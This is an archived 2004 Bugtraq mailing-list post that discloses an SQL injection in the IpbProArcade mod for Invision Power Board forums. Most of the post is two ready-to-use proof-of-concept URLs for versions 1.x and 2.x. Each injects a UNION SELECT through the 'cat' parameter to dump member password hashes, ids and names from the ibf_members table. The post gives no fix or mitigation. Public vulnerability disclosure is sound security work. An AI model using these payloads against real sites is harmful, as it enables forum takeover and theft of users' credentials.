[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: IpbProArace 2.5.x SQL injection.
From: axl daivy <axlownz () gmail ! com>
Date: 2004-11-20 20:05:53
Message-ID: 20041120200553.4085.qmail () www ! securityfocus ! com
[Download RAW message or body]
i have found an sql injection in the popular ipbproarcade mod for ipb systems (1.x \
and 2.x)
the vuln exists in the "category" field.
buy using this field it is possible to inject any sql query and compemise the entire \
forum system
p.o.c
for ipb 1.x
http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
for ipb 2.x
index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
discovered by Axl
credit goes to HLL for Helping me write the actual exploit
greetz to CereBrums And JonJon
cheers
Axl
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic